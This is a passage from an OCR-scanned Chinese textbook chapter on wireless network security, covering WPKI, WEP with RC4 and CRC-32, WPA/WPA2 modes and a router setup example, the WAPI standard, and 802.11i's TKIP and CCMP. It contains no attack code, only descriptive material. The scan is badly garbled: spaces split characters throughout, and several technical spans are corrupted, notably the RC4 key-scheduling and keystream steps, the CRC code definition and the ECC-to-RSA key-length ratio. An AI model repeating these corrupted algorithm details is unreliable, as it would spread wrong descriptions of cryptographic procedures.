。 对 于 短 时 间 内 无 法 获得 实质 性 服务 的 业务 ， 在 紧急 情况 下 可 先 提 供 服 务 ， 然 后 进 
行 滞后 认证 ; 如 未 能 通过 认证 ， 则 中 止 服务 ; 

。 选用 效率 高 且 需 要 资源 少 的 密码 算法 ; 

。 充分 利用 先前 已 建立 的 信任 关系 ， 减 少 再 次 认证 的 成 本 ， 如 缓存 机 制 和 临时 身份 


机 制 等 。 
© 兼容 性 、 可 移动 性 和 可 扩展 性 是 密切 关联 的 三 个 因素 ， 在 无 线 网 络 系统 中 应 对 
这 些 因 素 的 策略 是 : 


。 协商 机 制 一 一 移动 终端 和 无 线 网 络 协商 共同 支持 的 协议 和 算法 ; 

。 可 配置 机 制 一 一 合法 用 户 可 在 安全 保障 下 配置 终端 的 安全 选项 ; 

。 混合 制 策略 一 一 结合 不 同安 全 体制 , 形成 优势 互补 , 如 将 公 钥 和 单 钥 体制 相 结合 ， 
以 及 口令 和 指纹 相 结 合 。 一 方面 ， 以 公 钥 体制 保障 系统 的 可 扩展 性 ， 从 而 支持 兼 
容 性 和 用 户 的 可 移动 性 。 另 一 方面 ， 利 用 单 钥 体制 的 高 效 性 来 保证 实时 性 (如 切 
换 过 程 )， 进 一 步 确保 用 户 的 可 移动 性 ; 

多 策略 机 制 一 一 针对 不 同 的 场景 提供 不 同 的 安全 策略 ， 比 如 ， 首 次 登录 网 络 和 再 
次 接 入 网 络 的 认证 应 给 予 不 同 的 考虑 。 应 充分 利用 己 有 的 先 验 知识 来 节约 开销 ， 
提高 效率 。 另 外 切换 认证 也 应 该 较 普通 接 入 认证 有 更 高 的 效率 ; 

多 安全 级 别 策略 一 一 对 不 同 的 场合 和 需求 使 用 不 同 的 安全 级 别 。 如 普通 通话 和 基 
于 移动 终端 的 电子 商务 应 具有 不 同 的 安全 级 别 。 另 外 ， 不 同 的 无 线 网 络 也 具有 不 
同 的 安全 级 别 。 


3.5.3 无线 网 络 安 全 机 制 


本 节 主 要 介绍 无 线 网 络 安全 技术 的 概念 、 原 理 ， 包 括 无 线 公 开 密 钥 基 础 设施 、 有 线 
对 等 加 密 协 议 、 无 线 局 域 网 鉴别 与 保护 基础 设施 、VPN、 安 全 扫描 和 风险 评估 、 网 络 蜜 
钠 技 术 、 以 及 常见 的 安全 协议 。 
3.5.3.1 “无线 公开 密 钥 体 系 〈WPKI) 

WPKI 即 “ 无 线 公 开 密 钥 体 系 ”， 它 是 将 互联 网 电子 商务 中 PRI 
(PublicKeyInfrastructure) 安全 机 制 引 入 到 无 线 网 络 环境 中 的 一 套 遵循 既定 标准 的 密 钥 及 
证 书 管理 平台 体系 ， 用 它 来 管理 在 移动 网 络 环境 中 使 用 的 公开 密 钥 和 数字 证 书 ， 有 效 建 
立 安 全 和 值得 信赖 的 无 线 网 络 环境 , WPKI 并 不 是 一 个 全 新 的 PKI 标准 , 它 是 传统 的 PKI 
技术 应 用 于 无 线 环境 的 优化 扩展 。 它 采用 了 优化 的 ECC 椭圆 曲线 加 密 和 压缩 的 X.509 
数字 证 书 。 它 同样 采用 证 书 管理 公 钥 ,通过 第 三 方 的 可 信任 机 构 一 一 认证 中 心 (CA) 验 
证 用 户 的 身份 ， 从 而 实现 信息 的 安全 传输 。 
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基本 的 WPKI 组 件 包括 端 实体 应 用 (EE)、 注 册 中 心 (RA)、 认 证 中 心 (CA) 和 PKI 
目录 。WPKI 中 ， 端 实体 应 用 (ŒE) 和 注册 中 心 (RA) 的 实现 与 传统 PKI 不 同 ， 且 需 
一 个 全 新 的 组 件 一 一 PKI 门户 。 无 线 应 用 协议 CWAP) 中 的 端 实体 应 用 的 具体 实现 是 一 
个 运行 在 WAP 终端 上 的 优化 软件 ， 它 依靠 无 线 标记 语言 (WML) 脚本 加 密 接口 和 脚本 
加 密 库 来 做 密 钥 服务 和 加 脱 密 操 作 ， 具 体 函 数 包括 以 下 几 种 : 

。 用 户 公 私 钥 对 的 生成 、 存 储 和 访问 ; 

。 首次 证 书 应 用 的 完成 、 签 名 和 提交 ; 

。 证书 更 新 请 求 的 完成 、 签 名 和 提交 ; 

。 查找 证 书 和 撤销 信息 ; 

。 验证 证 书 和 读 取证 书 内 容 ; 

。 生成 和 验证 数字 签名 。 

PKI 门户 是 一 个 联网 的 服务 器 ， 类 似 WAP 网 关 ， 有 RA 的 逻辑 功能 ， 并 负责 转换 
WAP 客户 给 PKI 中 RA 和 CA 发 的 请 求 。PKI SI AK RA 函数 ， 和 无 线 网 上 的 WAP 
设备 及 有 线 网 络 上 的 CA 进行 交互 。 一 次 完整 的 WPKI 的 操作 流程 如 下 : 

。 EE 用 户 向 PKI 门户 申请 证 书 ; 

。 PKI 门户 审查 用 户 申请 ， 通 过 后 ， 给 CA 发 证 书 申请 ; 

CA 发 行 证 书 并 将 证 书 贴 到 有 效 证 书目 录 ; 

。 PKI 门户 创建 证 书 URL， 并 把 URL 发 送 给 EE 用 户 ; 

Web 服务 器 或 其 他 移动 电子 商务 服务 器 取 回 证 书 或 者 是 撤销 信息 ; 

EE 用 户 和 WAP 网 关 使 用 证 书 和 密 钥 建立 安全 的 WTLS 会 话 ，WAP 网 关 和 移动 
电子 商务 服务 器 或 者 Web 服务 器 建立 安全 的 SSL/TLS 会 话 ; 

© EE 用 户 用 私 钥 证 书 对 会 话 内 容 签名 ， 结 合 加 密 保 证 无 线 设备 和 因特网 间 的 数据 

安全 传输 。 

在 上 述 操作 流程 中 ，WTLS 会 话 的 客户 端 和 服务 端 在 验证 CA 根 证 书 有 效 性 时 ， 有 
两 种 方法 : 带 外 HASH 验证 方法 和 签名 验证 方法 。 

在 建立 无 线 安全 传输 层 (WTLS) 会 话 的 过 程 中 ， 客 户 端 把 证 书 URL 发 给 服务 端 ， 
服务 端 使 用 该 URL 去 取证 书 。 取 到 证 书后 ， 服 务 端 使 用 该 证 书 ， 但 不 会 把 证 书 发 给 客 
户 端 。 客 户 端 只 接收 和 存储 证 书 URL， 可 以 节约 有 限 的 带宽 和 存储 资源 。URL 的 定义 
可 以 有 两 种 机 制 : LDAPURL 和 HTTPURL。 

制定 WPKI 证 书 格式 规范 是 为 前 减 公 钥 证 书 所 占用 的 存储 空间 。 其 机 制 之 一 是 为 服 
务 端 证 书 定义 一 种 新 的 证 书 格式 ( 即 WTLS 证 书 格式 ), 与 标准 的 .X509 证 书 相 比 ， 该 证 
书 大 大 减少 了 所 占用 的 存储 空间 。WPKI 证 书 上 的 另 一 个 非常 重要 的 精简 就 是 使 用 了 椭 
圆 曲线 加 密 算法 ECC, ECC 算法 使 用 的 密 钥 比 RSA 算法 的 密 钥 要 短 ， 通 过 使 用 ECC 算 
法 ， 可 使 证 书 的 存储 空间 比 使 用 其 他 算法 的 证 书 要 少 100 字 节 左右 。WPKI 还 限制 了 
IETF/PKIX 证 书 格式 中 某 些 数据 域 的 大 小 ， 由 于 WPKI 证 书 格式 是 PKIX 证 书 格式 的 一 
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个 子 集 ， 因 而 可 保持 与 标准 PKI 之 间 的 互 操作 性 。 

在 WAP 安全 标准 中 ， 尽 管 传统 的 签名 机 制 为 可 选项 ， 但 由 于 占用 资源 多 和 因 WAP 
设备 处 理 能 力 低 带 来 的 性 能 问题 ， 使 得 在 无 线 环境 中 实现 传统 的 签名 机 制 是 没有 实用 价 
值 的 。 与 ECC 加 密 签名 算法 相 比 ， 传 统 的 签名 机 制 〈 如 RSA 算法 ) 需要 更 多 的 处 理 资 
源 和 更 多 的 存储 空间 。ECC 加 密 签名 算法 是 业内 公认 的 目前 最 精简 的 签名 算法 ， 是 支持 
无 线 环境 下 的 安全 机 制 的 一 个 最 合适 的 选择 。 典 型 的 ECC 算法 使 用 的 密 钥 长 度 为 163 
位 , 而 在 同等 加 密 强 度 的 RSA 算法 的 密 钥 是 1024 位 , 即 ECC 算法 使 用 的 密 钥 长 度 只 是 
同等 加 密 强 度 的 RSA 算法 密 钥 长 度 的 116。ECC 算法 的 上 述 特点 使 得 密 钥 存储 和 证 书 存 
储 占 用 空间 减少 ， 数 字 签名 的 处 理 效率 得 到 提高 。ECC 算法 在 WAP 安全 标准 中 得 到 充 
分 支持 ， 在 WAP 设备 制造 中 得 到 了 广泛 应 用 。 
3.5.3.2 ”有 线 等 效 保密 协议 (WEP) 

有 线 等 效 保密 协议 WEP 是 1999 年 9 月 通过 的 IEEE802.11 标准 的 一 部 分 ,使 用 RC4 
(RivestCipher) 串 流 加 密 技 术 达 到 机 密 性 ， 并 使 用 CRC-32 验 和 达到 资料 正确 性 。 标 准 
的 64 比特 WEP 使 用 40 比特 的 钥匙 接 上 24 比特 的 初 向 量 (Initialization Vector, IV) 成 
为 RC4 用 的 钥匙 。 在 起 草原 始 的 WEP 标准 的 时 候 ， 美 国政 府 在 加 密 技 术 的 输出 限制 中 
限制 了 钥匙 的 长 度 ， 一 旦 这 个 限制 放宽 之 后 ， 所 有 的 主要 业者 都 用 104 比特 的 钥匙 作 了 
128 比特 的 WEP 延伸 协定 。 用 户 输入 128 比特 的 WEP 钥匙 的 方法 一 般 都 是 用 含有 26 
个 十 六 进 制 数 (0-9 和 A-F) 的 字 串 来 表示 ,每 个 字符 代表 钥匙 中 的 4 个 比特 ，4*26=104 
比特 ， 再 加 上 24 比特 的 TV 就 成 了 所 谓 的 “128 比特 WEP 钥匙 >。 有些 厂商 还 提供 256 
比特 的 WEP 系统 ， 就 像 上 面 讲 的 ，24 比特 是 IV， 实 际 上 剩 下 232 比特 作为 保护 之 用 ， 
典型 的 作法 是 用 58 个 十 六 进 制 数 来 输入 ，(58*4=232 比特 ) +24 个 IV 比特 =256 个 WEP 
比特 。 钥 匙 长 度 不 是 WEP 安全 性 的 主要 因素 ， 破 解 较 长 的 钥匙 需要 拦截 较 多 的 封包 ， 
但 是 有 某 些 主动 式 的 攻击 可 以 激发 所 需 的 流量 。WEP 还 有 其 他 的 弱点 ， 包 括 IV 雷同 的 
可 能 性 和 变 造 的 封包 ， 这 些 用 长 一 点 的 钥匙 根本 没有 用 。 

WEP 有 2 种 认证 方式 : 开放 式 系统 认证 Copensystemauthentication) 和 共有 键 认证 
(sharedkeyauthentication )。 开 放 式 系统 认证 ， 顾 名 思 义 ， 不 需要 密 钥 验 证 就 可 以 连接 。 
而 对 于 共有 键 认证 而 言 ， 客 户 端 需要 放送 与 接 入 点 预存 密 钥 匹配 的 密 钥 。 共 有 键 一 共有 
4 个 步骤 : 

O 客户 端 向 接 入 点 发 送 认 证 请 求 ; 

@ 接 入 点 发 回 一 个 明文 ; 

© 客户 端 利 用 预存 的 密 钥 对 明文 加 密 ， 再 次 向 接 入 点 发 出 认证 请 求 ; 

图 接 入 点 对 数据 包 进行 解密 ， 比 较 明 文 ， 并 决定 是 否 接受 请 求 。 一 般 而 言 ， 共 有 
键 认 证 的 安全 性 高 于 开放 式 系统 认证 , 但 是 就 目前 的 技术 而 言 , 完全 可 以 无 视 这 种 认证 。 

RC4 加 密 算法 是 一 种 密 钥 长 度 可 变 的 流 加 密 算法 族 。 之 所 以 称 其 为 族 ， 是 由 于 其 核 
心 部 分 的 S-box 长 度 可 为 任意 ， 但 一 般 为 256 字 节 。 该 算法 的 速度 可 以 达到 DES 加 密 的 


第 3 章 网 络 安全 基础 


10 倍 左右 ， 且 具有 很 高 级 别 的 非 线性 。RC4 算法 的 原理 很 简单 , 包括 初始 化 算法 (KSA) 
和 伪 随 机 子 密码 生成 算法 (PRGA) 两 大 部 分 。 设 密 钥 K 是 1 字 节 长 , 用 KO], …, KU- 
表示 。KSA 算法 将 输入 的 密 钥 (无 论 是 40 位 还 是 256 位 ) 转化 为 一 个 初始 置换 S (0， 
1…2"-1)。 在 初始 化 过 程 中 ， 将 S 置换 设 定 为 不 变 的 置换 ， 将 变量 j 初始 值 设 为 0。 接 着 
进入 循环 ， 循 环 次 数 为 2-1， 每 次 循环 中 i 的 值 增加 1, j 的 值 增 加 s[ij+K[imodl]， 接 着 ， 
将 S 回 与 Simodl] 的 值 交 换 。PRGA 中 首先 在 初始 化 中 将 向 量 i, j 初始 值 设 为 0。 接 着 开 
始 循环 ， 循 环 中 包括 四 种 简单 的 运算 ， 分 别 为 :变量 i 每 次 增长 1， 作 为 计数 器 ; 变量 j 
每 次 增长 伪 随 机 变量 Sil 将 SES SHER: 输出 值 为 S[S[]+SD]]。 将 z 与 明文 异 或 可 
产生 密 文 , 与 密 文 异 或 可 产生 明文 。- RC4 算法 采用 的 是 输出 反馈 (output_feedbaok, OFB) 
工作 方式 ， 所 以 可 以 用 一 个 短 的 密 钥 产生 一 个 相对 较 长 的 密 钥 序列 。OFB 方式 最 大 的 优 
点 是 消息 如 果 发 生 错 误 〈 这 里 指 的 是 消息 的 某 一 位 发 生 了 改变 ， 而 不 是 消息 的 某 一 位 丢 
失 ), 错误 不 会 传递 到 产生 的 密 钥 序列 上 , 缺点 是 对 插入 的 攻击 很 敏感 ， 并 且 对 同步 的 要 
求 比较 高 。 

CRC 码 是 由 两 部 分 组 成 , 前 部 分 是 信息 码 , 就 是 需要 校 验 的 信息 , 后 部 分 是 校 验 码 ， 
WE CRC EIK n 个 bit, EIK kA bit, RPA Cn, k) 码 。 它 的 编码 规则 是 : 首 
先 将 原 信息 码 (kbit) 左 移 r 位 (ktr=n)， 再 运用 一 个 生成 多 项 式 g (x) (也 可 看 成 二 进 
制 数 ) 用 模 2 除 上 面 的 式 子 ， 得 到 的 余数 就 是 校 验 码 。 在 802.11 的 情况 下 ， 校 验 和 是 一 
个 32 比特 的 值 ， 用 于 生成 它 的 算法 称 为 CRC-32。 

WEP 加 密 过 程 如 下 : 

© 校 验 和 计算 : 根据 要 发 送 的 原始 消息 p 的 二 进 制 码 流通 过 CRC-32 计算 出 完整 性 
校 验 和 ICV (IntegrityCheckValue， 简 写 为 C(p))， 然 后 将 Cp) 附加 在 原始 明文 p 的 
尾部 ， 链 接 成 完整 的 明文 P=<p，C (P) >, WURI, C O) 及 明文 了 与 密 钥 k 无关 。 

@ 生成 密 钥 流 : 选择 一 个 24 位 的 初始 化 向 量 IV (简写 为 v)， 由 v 和 40 位 的 共享 
密 钥 (SecretKey) k 组 成 64 位 的 码 流 ， 即 密 钥 流 的 种 子 (Seed)。 再 将 64 位 的 种 子 输入 
伪 随 机 序列 产生 器 PRNG (pseudorandomnumbergenerator)。 经 过 RC4 算法 就 生成 密 钥 序 
列 (KeySequence) 或 称 为 密 钥 流 (KeyStream)， 它 是 初始 化 向 量 v 和 密 钥 k 的 函数 ， 表 
示 为 RC4<v，k>。 

© 数据 加 密 : 将 明文 P=<P，C (p) > 和 密 钥 流 RC4<v，k> 相 异 或 得 到 密 文 C。 

@ 数据 传输 : 把 IV 放 在 数据 帧 的 头 部 ， 其 后 链接 密 文 C， 就 得 到 要 发 送 的 数据 帧 ， 
然后 通过 无 线 方式 发 送 到 接收 端 。 

© WEP 加 密 后 的 数据 帧 分 为 三 个 数据 段 , 分 别 为 32bits 的 TV 数据 段 (实际 形成 数 
据 帧 时 ，IV 不 是 24bits)， 要 发 送 的 数据 单元 PDU 以 及 32bits 的 ICV( 即 32 位 循环 校 验 
码 )。 其 中 , IV 是 明文 传送 的 ， 而 数据 单元 和 ICV 是 加 密 的 。IV 数据 段 又 包含 三 个 数据 
项 , 分别 为 24bits 的 初始 向 量 InitVector、6bits 的 填充 数据 和 2bits 的 KeyID。 其 中 Initvector 
用 来 构成 WEPseed; KeyID 可 以 选择 四 个 密 钥 中 的 其 一 ， 用 于 该 数据 帧 加 密 ; Obits 的 填 
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充 数据 部 分 全 为 “0”。 

WEP 对 数据 帧 的 解密 过 程 是 报 文 加 密 的 逆 过 程 : 

O 产生 密 钥 流 : 从 收 到 的 数据 帧 中 ， 分 离 出 24 位 的 初始 化 向 量 TV 简写 为 v)， 
并 使 用 和 发 送 端 加 密 时 同样 的 40 位 密 钥 k， 按 照 与 发 送 端 相 同 的 步骤 生成 密 钥 流 
(KeySequence), #2733) RC4<v, k>. 

@ 恢复 明文 : 从 收 到 的 数据 帧 中 ， 分 离 出 密 文 信息 C， 将 其 与 密 钥 流 RC4<v, k> 
进行 异 或 运算 ， 进 而 可 以 恢复 明文 信息 。 

图 比较 校 验 和 : 接收 方 得 到 明文 信息 P* 后 ， 把 它 表 示 为 Pfy=<p#+，c (p*) > 的 形式 ， 
即 重新 计算 p* 的 CRC-32 校 验 和 C (p*), 然后 比较 C (p) ALC (p*) 是 否 相 等 ， 即 ICV 
是 否 等 于 ICV*， 这 样 就 可 以 保证 只 有 匹配 的 校 验 和 的 数据 帧 才 可 以 被 接收 方 接收 。 

WEP 算法 通过 以 上 的 操作 试图 达到 以 下 目的 : 其 一 ， 采 用 RC4 算法 加 密 保证 通信 
的 安全 性 ， 防 止 被 动 攻击 ， 其 二 ， 采 用 CRC-32 算法 作为 完整 性 检验 ， 阻 止 主动 攻击 。 
但 WEP 由 于 先天 性 的 缺陷 ， 无 法 达到 以 上 要 求 。 
3.5.3.3 Wi-Fi 网 络 安全 接 入 WPA/WPA2) 

WPA 全 名 为 Wi-FiProtectedAccess， 有 WPA 和 WPA2 两 个 标准 ， 是 一 种 保护 无 线 电 
脑 网 络 (Wi-Fi) 安全 的 系统 ， 它 是 应 研究 者 在 前 一 代 的 系统 有 线 等 效 加 密 (WEP) 中 找 
到 的 几 个 严重 的 弱点 而 产生 的 。WPA 适用 于 TEEE802.11i 标准 的 大 部 分 ， 是 在 802.11i 
完备 之 前 替代 WEP 的 过 渡 方案 。WPA 的 设计 可 以 用 在 所 有 的 无 线 网 卡 上 ， 但 未 必 能 用 
在 第 一 代 的 无 线 取 用 点 上 。WPA2 具备 完整 的 标准 体系 ， 但 其 不 能 被 应 用 在 某 些 老 旧 型 
号 的 网 卡 上 。 

在 WPA 的 设计 中 要 用 到 一 个 802.1X 认证 服务 器 来 散布 不 同 的 钥匙 给 各 个 用 户 ; 不 
过 它 也 可 以 用 在 较 不 保险 的 “pre-sharedkey”(PSK) 模式 ， 让 每 个 用 户 都 用 同一 个 密语 。 
Wi-Fi 联盟 把 这 个 使 用 pre-sharedkey 的 版 本 叫做 WPA 个 人 版 或 WPA2 个 人 版 ,用 802.1X 
认证 的 版 本 叫做 WPA 企业 版 或 WPA2 企业 版 。 

WPA 的 资料 是 以 一 把 128 位 元 的 钥 是 和 一 个 48 位 元 的 初 向 量 CIV) 的 
RC4streamcipher 来 加 密 。WPA 超越 WEP 的 主要 改进 就 是 在 使 用 中 可 以 动态 改变 钥匙 的 
“临时 钥匙 完整 性 协定 ”(TemporalKeyIntegrityProtocol，TKIP)， 加 上 更 长 的 初 向 量 ， 这 
可 以 击败 知名 的 针对 WEP 的 金 钥 是 取 攻 击 。 
除了 认证 跟 加 密 外 ，WPA 对 于 所 载 资料 的 完整 性 也 提供 了 巨大 的 改进 。WEP 所 使 
用 的 CRC〔〈 循 环 兄 余 校 验 ) 先天 就 不 安全 ， 在 不 知道 WEP 钥匙 的 情况 下 ， 要 算 改 所 载 
资料 和 对 应 的 CRC 是 可 能 的 , 而 WPA (EH TEKA “Michael” 的 更 安全 的 信息 认证 码 ( 在 
WPA 中 叫做 信息 完整 性 查核 ，MIC)。 进 一 步 地 ，WPA 使 用 的 MIC 包含 了 帧 计数 器 ， 
以 避免 WEP 的 另 一 个 弱点 一 replayattack 〔 回 放 攻 击 ) 一 的 利用 。 

WPA 加 密 方 式 目前 有 四 种 认证 方式 : WPA、WPA-PSK、WPA2、WPA2-PSK。 采用 
的 加 密 算法 有 二 种 : AES (AdvancedEncryptionStandard 高 级 加 密 算 法 ) 和 TKIP 
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(TemporalKeyIntegrityProtocol 临时 密 钥 完整 性 协议 )。 

@ WPA 是 用 来 替代 WEP 的 。WPA 继承 了 WEP 的 基本 原理 而 又 弥补 了 WEP 的 缺 
A: WPA 加 强 了 生成 加 密 密 钥 的 算法 ， 因 此 即便 收集 到 分 组 信息 并 对 其 进行 解析 ， 也 几 
平 无 法 计算 出 通用 密 钥 :WPA 中 还 增加 了 防止 数据 中 途 被 算 改 的 功能 和 认证 功能 。 

@ WPA-PSK (预先 共享 密 钥 Wi-Fi 保护 访问 ): WPA-PSK 适用 于 个 人 或 普通 家 庭 
网 络 , 使 用 预先 共享 密 钥 , 秘 钥 设 置 的 密码 越 长 , 安全 性 越 高 。WPA-PSK 只 能 使 用 TKIP 
加 密 方式 。 

@ WPA2: WPA2 是 WPA 的 增强 型 版 本 ， 与 WPA 相 比 ，WPA2 新 增 了 支持 AES 
的 加 密 方式 。 

@ WPA2-PSK: 与 WPA-PSK 类 似 ， 适 用 于 个 人 或 普通 家 庭 网 络 ， 使 用 预先 共享 密 
钥 ， 支 持 TKIP 和 AES 两 种 加 密 方式 。 

一 般 在 家 庭 无 线路 由 器 设置 页 面 上 ,选择 使 用 WPA-PSK 或 WPA2-PSK 认证 类 型 即 
可 ， 对 应 设置 的 共享 密码 尽 可 能 长 些 ， 并 且 在 经 过 一 段 时 间 之 后 更 换 共 享 密码 ， 确 保 家 
庭 无 线 网 络 的 安全 。 

下 面 是 一 个 在 无 线路 由 器 上 设置 WPA 的 例子 。 

在 无 线 参数 中 ， 选 择 开启 安全 设置 ， 选 择 WPA-PSK， 选 择 安全 选项 WPA-PSK， 选 
择 加 密 方法 ， 输 入 PSK 密码 。 在 标 有 WPA 共享 密 钥 的 地 方 ， 输 入 预 共享 密 铀 ， 在 标 有 
组 密 钥 更 新 的 地 方 ， 输 入 多 长 时 间 该 密 钥 将 更 新 。 单 击 保存 设置 。 

注 : 密 钥 更 新 时 间 一 般 应 该 设置 多 长 合适 ?没有 一 个 好 的 答案 , 假若 你 将 它 设置 的 过 
于 短 的 话 ， 例 如 1~~2min， 的 确 安全 性 是 提高 了 ， 但 是 对 于 某 些 网 卡 来 说 ， 这 样 有 可 能 
导致 发 生 一 些 连接 问题 。 推 荐 根据 厂家 的 默认 值 就 可 以 。 对 于 启用 WPA 加 密 ， 还 需要 
把 超级 密码 告诉 每 一 个 无 线 网 卡 ， 这 样 网 络 中 的 每 一 台 机 器 才 会 知道 如 何 解码 与 无 线路 
由 器 的 通话 。 依 次 设置 无 线 家 庭 网 络 中 的 每 一 台 机 器 ， 记 住 每 次 都 要 核对 一 下 是 否 已 经 
连接 到 无 线路 由 器 。 
3.5.3.4 “无线 局 域 网 鉴别 与 保密 体系 CWAPID 

无 线 局 域 网 鉴别 和 保密 体系 (WirelessLANAuthenticationandPrivacyInfrastructure 
WAPI)， 是 一 种 安全 协议 ， 同 时 也 是 中 国 无 线 局 域 网 安全 强制 性 标准 。 当 前 全 球 无 线 局 
域 网 领域 仅 有 的 两 个 标准 , 分 别 是 美国 行业 标准 组 织 提出 的 下 EE802.11 系列 标准 (俗称 
Wi-Fi， 包 括 802.11a/b/g/n/ac 等 )， 以 及 中 国 提出 的 WAPI 标准 。WAPI 是 我 国 首 个 在 计 
算 机 宽带 无 线 网 络 通信 和 领域 自主 创新 并 拥有 知识 产权 的 安全 接 入 技术 标准 。WAPI 由 于 
采用 了 更 加 合理 的 双向 认证 加 密 技术 ， 比 802.11 更 为 先进 ，WAPI 采用 国家 密码 管理 委 
员 会 办 公 室 批准 的 公开 密 钥 体制 的 椭圆 曲线 密码 算法 和 秘密 密 钥 体制 的 分 组 密码 算法 ， 
实现 了 设备 的 身份 鉴别 、 链 路 验证 、 访 问 控制 和 用 户 信息 在 无 线 传输 状态 下 的 加 密 保护 。 
此 外 ，WAPI 从 应 用 模式 上 分 为 单 点 式 和 集中 式 两 种 ， 可 以 彻底 扭转 目前 WLAN 采用 多 
种 安全 机 制 并 存 且 互 不 兼容 的 现状 ， 从 根本 上 解决 安全 问题 和 兼容 性 问题 。 所 以 我 国 强 
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制 性 地 要 求 相关 商业 机 构 执行 WAPI 标准 能 更 有 效 地 保护 数据 的 安全 。 

与 WIFI 的 单 向 加 密 认 证 不 同 ，WAPI 双向 均 认证 ， 从 而 保证 传输 的 安全 性 。WAPI 
安全 系统 采用 公 钥 密码 技术 ， 鉴 权 服 务 器 AS 负责 证 书 的 颁发 、 验 证 与 吊销 等 ， 无 线 客 
户 端 与 无 线 接 入 点 AP 上 都 安装 有 AS 颁发 的 公 钥 证 书 ， 作 为 自己 的 数字 身份 凭证 。 当 
无 线 客户 端 登录 至 无 线 接 入 点 AP 时 ， 在 访问 网 络 之 前 必须 通过 鉴别 服务 器 AS 对 双方 
进行 身份 验证 。 根 据 验 证 的 结果 ， 持 有 合法 证 书 的 移动 终端 才能 接 入 持 有 合法 证 书 的 无 
线 接 入 点 AP. WAPI 包括 两 部 分 : WAL (WLANAuthenticationInfrastructure) 和 WPI 
(WLANPrivacyInfrastructure). WAI 和 WPI 分 别 实现 对 用 户 身 份 的 鉴别 和 对 传输 的 业务 
数据 加 密 ， 其 中 WAI 采用 公开 密 钥 密码 体制 ， 利 用 公 钥 证 书 来 对 WLAN 系统 中 的 STA 
和 AP 进行 认证 ; WPI 则 采用 对 称 密码 算法 实现 对 MAC 层 MSDU 的 加 、 解 密 操 作 。 

WAPI 接 入 控制 中 包括 以 下 实体 : 

© 鉴别 服务 单元 ASU (authenticationserviceunit)， 基 本 功能 是 实现 对 用 户 证 书 的 管 
理 和 用 户 身份 的 鉴别 等 ， 是 基于 公 钥 密码 技术 的 WAI 鉴别 基础 结构 中 重要 的 组 成 部 分 。 
ASU 管理 的 证 书 里 包含 证 书 颁发 者 (ASU) 的 公 钥 和 签名 以 及 证 书 持 有 者 STA 和 AP 的 
公 钥 和 签名 ， 并 采用 WAPI 特有 的 椭圆 曲线 作为 数字 签名 算法 。 

@ 鉴别 器 实体 AE (AuthenticatorEntity)， 为 鉴别 请 求 者 实体 在 接 入 服务 之 前 提供 
鉴别 操作 的 实体 。 该 实体 驻 留 在 AP 设备 或 者 AC 设备 中 。 鉴 别 请 求 者 实体 ASUE 
(AuthenticationSupplicantEntity)， 在 接 入 服务 之 前 请 求 进行 鉴别 操作 的 实体 。 该 实体 驻 
留 在 STA 中 。 

© 鉴别 服务 实体 ASE (AuthenticationServiceEntity)， 为 鉴别 器 实体 和 鉴别 请 求 者 
实体 提供 相互 鉴别 服务 的 实体 。 该 实体 驻 留 在 ASU 中 。 

为 了 使 STA 能 够 识别 启用 WAPI 无 线 安 全 机 制 ， 在 信 标 帧 、 关 联 请 求 帧 、 重 新 关联 
请 求 帧 和 探 询 请 求 帧 中 携带 WAPI 信息 元 素 。 对 于 AP 来 说 ， 需 要 在 发 出 信 标 帧 和 探 询 
响应 帧 中 ， 根 据 当前 AP 上 WAPI 的 配置 加 入 相应 的 WAPI 信息 元 素 。 同 时 ， 解 析 关 联 
请 求 帧 和 重新 关联 请 求 帧 ， 只 有 在 符合 当前 AP 上 WAPI 的 配置 条 件 时 才能 和 该 STA 进 
行 后 续 的 协商 。 
WAPI 鉴别 及 密 钥 管理 的 方式 有 两 种 ， 即 基于 证 书 和 基于 预 共 享 密 钥 PSK。 若 采用 
基于 证 书 的 方式 ， 整 个 过 程 包括 证 书 鉴别 、 单 播 密 钥 协商 与 组 播 密 钥 通告 ， 若 采用 预 共 
享 密 钥 的 方式 ， 整 个 过 程 则 为 单 播 密 钥 协商 与 组 播 密 钥 通告 。 

WPI 保密 基础 结构 对 MAC 子 层 的 MPDU 进行 加 、 解 密 处 理 ， 但 对 于 WAI 协议 分 
组 不 进行 加 解密 处 理 。 
3.5.3.5 802.11i 

TEEE802.11i 是 802.11 工作 组 为 新 一 代 WLAN 制定 的 安全 标准 , 主要 包括 加 密 技 术 : 
TKIP (TemporalKeyIntegrityProtocol), AES (AdvancedEncryptionStandard) 以 及 认证 协 
议 IEEE802.1x。 认 证 方面 。IEEE802.11i 采用 802.1x 接 入 控制 ， 实 现 无 线 局 域 网 的 认证 
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与 密 钥 管理 , 并 通过 EAP-Key 的 四 向 握手 过 程 与 组 密 钥 握手 过 程 , 创建 、 更 新 加 密 密 钥 ， 
实现 802.11i 中 定义 的 鲁 棒 安 全 网 络 (RobustSecurityNetwork, RSN) 的 要 求 。 

数据 加 密 方面 ，IEEE802.11i 定义 了 TKIP (TemporalKeyIntegrityProtocol)、CCMP 
(Counter-Mode/CBC-MACProtocol) 和 WRAP (WirelessRobustAuthenticatedProtocol) = 
种 加 密 机 制 。 一 方面 ，TKIP 采用 了 扩展 的 48 位 IV 和 IV 顺序 规则 、 密 钥 混 合 函 数 
(KeyMixingFunction)， 重 放 保 护 机 制 和 Michael 消息 完整 性 代码 (安全 的 MIC 码 ) 这 4 
种 有 力 的 安全 措施 ， 解 决 了 WEP 中 存在 的 安全 漏洞 ， 提 高 安全 性 。 就 目前 已 知 的 攻击 
方法 而 言 ，TKIP 是 安全 的 。 另 一 方面 ，TKIP 不 用 修改 WEP 硬件 模块 ， 只 需 修改 驱动 
程序 ， 升 级 也 具有 很 大 的 便利 性 。 因 此 ， 采 用 TKIP 代替 WEP 是 合理 的 ， 但 是 TKIP 是 
基于 RC4 的 ，RC4 已 被 发 现存 在 问题 ， 可 能 今后 还 会 被 发 现 其 他 的 问题 。 

另外 ，RC4 一 类 的 序列 算法 ， 其 加 解密 操作 只 是 简单 的 异 或 运算 ， 在 无 线 环境 下 具 
有 一 定 的 局 限 性 ， 因 此 TKIP 只 能 作为 一 种 短期 的 解决 方案 。 此 外 ，802.11 中 配合 AES 
使 用 的 加 密 模 式 CCM 和 OCB， 并 在 这 两 种 模式 的 基础 上 构造 了 CCMP 和 WRAP 密码 
协议 。CCMP 机 制 基 于 AES ( AdvancedEncryptionStandard ) 加 密 算法 和 CCM 
(Counter-Mode/CBC-MAC) 认证 方式 ， 使 得 WLAN 安全 程度 大 大 提高 ， 是 实现 RSN 的 
强制 性 要 求 。 由 于 AES 对 硬件 要 求 比较 高 , CCMP 无 法 通过 在 现 有 设备 的 基础 上 升级 实 
